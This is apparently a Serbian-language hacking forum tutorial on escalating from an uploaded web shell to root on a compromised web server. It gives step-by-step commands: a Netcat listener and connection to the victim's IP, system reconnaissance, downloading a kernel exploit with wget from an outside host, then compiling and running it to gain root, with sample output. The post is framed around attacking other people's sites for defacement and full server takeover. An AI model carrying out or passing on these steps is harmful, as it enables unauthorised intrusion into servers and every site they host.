Ovo sam hteo da napisem i stavim u ViP sekciju, al sam se predomisio.
Znaci vecina vas zna neke osnovne vrste napada na sajtove SQL, RFI, LFI itd, necu da ih nabrajam dalje valjda ih znate..
E fora je sad sto se vi svi tu zaustavite, upload deface i to je to. Postoji jos par fora, ovo je jedan od njih, jedna od najmocnijih
Rooting a webserver, tj da dobijete pristup serveru, kao administrator servera.
Znaci vi necete imati samo taj site, nego sve sajtove na tom serveru.
Za ovo morate imati uploadovan shell i morate
Trebat ce nam par :
-Netcat (Za Windows:http://joncraton.org/files/nc111nt.zip)
-Shell (Moze se naci bilo gde, nije bitno koji cete da kotistite u ovome tutorialu)
Posto imamo sve sto je potrebno bacicemo se na posao. Uploadujemo sell na hakovani sajt
(to sigurno znate da uradite ako ste ikada napadali neki sajt. Ako niste, naucite to pa se vratite ovde).
Shell je uploadovan i krece zabava!
Napravimo konekciju na nas racunar preko shella(unesemo nas ip, port...)
Kada smo to uradili otvorimo netcatov folder preko command prompta(na linuxu preko terminala, na bt5 samo otvorimo terminal)
i kucamo:
Quote:
nc -l -n -v -p 8080
Lupite enter, vratite se na stranicu sa Vasim shellom.
Sada na sopstvenom kompu(u command promptu)kucamo:
Quote:
nc ZRTVIN_IP 8080
Kada smo to zavrsili kucamo
Quote:
uname -a;id
ili [quote]uname -a[/qoute]
da dobijemo vise informacija o serveru. Kada smo dobili informacije o serveru, potrazimo exploit za tu verzuju servera. Evo primera za dobijene informacije:
Quote:
Linux nesto.com 2.6.8-2-686-smp #1 SMP Tue Aug 16 12:08:30 UTC 2005 i686 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Trazimo exploit za ovaj server. Kada smo ga nasli kucamo(u netcatu naravno, koji je vec konektovan):
Quote:
wget
http://www.exploit.com/xpl.c(ovo je exploit u c-u!)
E sada, moramo ga je ucinimo dostupnim za sve korisnike. Koristicemo "gcc" da kompajliramo.
Quote:
gcc xpl.c -o xpl;chmod +x xpl
Kada smo to zavrsili, to bi trebalo da pokrenemo. Kucajmo:
Quote:
./xpl
Kada se nasa skripta pokrenula, kucamo:
Quote:
whoami
Ovim dobijamo informaciju koji smo mi korisnik, grupa itd...
I izbacuje.... dobli smo sledece:
Quote:
uid=0(root) gid=0(root) groups=450(apache)
Imamo pristup rootu(glavni administrator servera)
I to je to! Uspesno smo upali u web server! I sada mozemo da radimo sta zelimo i kada zelimo
Nadam se da ste uzivali u ovome tutorialu!